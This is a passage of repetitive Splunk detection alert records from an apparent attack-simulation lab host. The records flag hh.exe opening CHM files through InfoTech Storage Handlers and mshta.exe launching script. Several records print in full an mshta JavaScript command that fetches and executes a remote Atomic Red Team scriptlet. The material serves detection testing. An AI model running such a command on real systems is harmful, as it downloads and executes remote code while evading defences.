\"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", process_id="6064", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", parent_process_id="6480", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", process_id="6064", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_id="0x1950", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html\"", process_id="0x1e90", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:29", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_id="0x1950", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_WSH_JSCRIPT_1.html\"", process_id="0x1e90", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_id="0x1950", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_SHORTCUT_1.html\"", process_id="0x29c", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:31", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_id="0x1950", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm::/TEMPLATE_SHORTCUT_1.html\"", process_id="0x29c", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_id="0x1950", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", process_id="0x17b0", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739951, search_name="ESCU - Detect HTML Help Using InfoTech Storage Handlers - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious Compiled HTML Activity", annotations="{\"analytic_story\": [\"Suspicious Compiled HTML Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 90, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Actions on Objectives\"], \"mitre_attack\": [\"T1218\", \"T1218.001\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious Compiled HTML Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.001", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:24", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:24", parent_process="C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", parent_process_id="0x1950", process="\"C:\\Windows\\hh.exe\" \"its:C:\\Users\\Administrator\\AppData\\Local\\Temp\\2\\Test.chm\"", process_id="0x17b0", process_name="hh.exe", risk_message="hh.exe has been identified using Infotech Storage Handlers to load a specific file within a CHM on win-host-mhaag-attack-range-117 under user Administrator.", risk_object="Administrator", risk_object_type="user", risk_score="72.0", savedsearch_description="The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file using InfoTech Storage Handlers. This particular technique will load Windows script code from a compiled help file, using InfoTech Storage Handlers. itss.dll will load upon execution. Three InfoTech Storage handlers are supported - ms-its, its, mk:@MSITStore. ITSS may be used to launch a specific html/htm file from within a CHM file. CHM files may contain nearly any file type embedded. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", threat_object="hh.exe", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_name="cmd.exe", process="C:\\Windows\\System32\\mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_name="cmd.exe", process="C:\\Windows\\System32\\mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="MSHTA.EXE", parent_process="\"cmd.exe\" /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", parent_process_name="cmd.exe", process="mshta.exe  javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="MSHTA.EXE", parent_process="\"cmd.exe\" /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", parent_process_name="cmd.exe", process="mshta.exe  javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();", process_name="mshta.exe", risk_message="An instance of cmd.exe spawning mshta.exe was identified on endpoint $est$ by user Administrator attempting to access a remote destination to download an additional payload.", risk_object="Administrator", risk_object_type="user", risk_score="80.0", savedsearch_description="This analytic identifies when Microsoft HTML Application Host (mshta.exe) utility is used to make remote http connections. Adversaries may use mshta.exe to proxy the download and execution of remote .hta files. The analytic identifies command line arguments of http and https being used. This technique is commonly used by malicious software to bypass preventative controls. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process \"rundll32.exe\" and its parent process.", threat_object="cmd.exe", threat_object="mshta.exe", threat_object_type="process", threat_object_type="process", user="Administrator"
1657739733, search_name="ESCU - Detect MSHTA Url in Command Line - Rule", analyticstories="Living Off The Land", analyticstories="Suspicious MSHTA Activity", annotations="{\"analytic_story\": [\"Suspicious MSHTA Activity\", \"Living Off The Land\"], \"cis20\": [\"CIS 8\"], \"confidence\": 100, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 80, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1218\", \"T1218.005\"], \"nist\": [\"PR.PT\", \"DE.CM\"], \"observable\": [{\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}, {\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"parent_process_name\", \"role\": [\"Parent Process\"], \"type\": \"Process\"}, {\"name\": \"process_name\", \"role\": [\"Child Process\"], \"type\": \"Process\"}]}", annotations.analytic_story="Suspicious MSHTA Activity", annotations.analytic_story="Living Off The Land", annotations.cis20="CIS 8", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1218", annotations.mitre_attack="T1218.005", annotations.nist="PR.PT", annotations.nist="DE.CM", count="1", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:52", info_max_time="+Infinity", info_min_time="0.000", 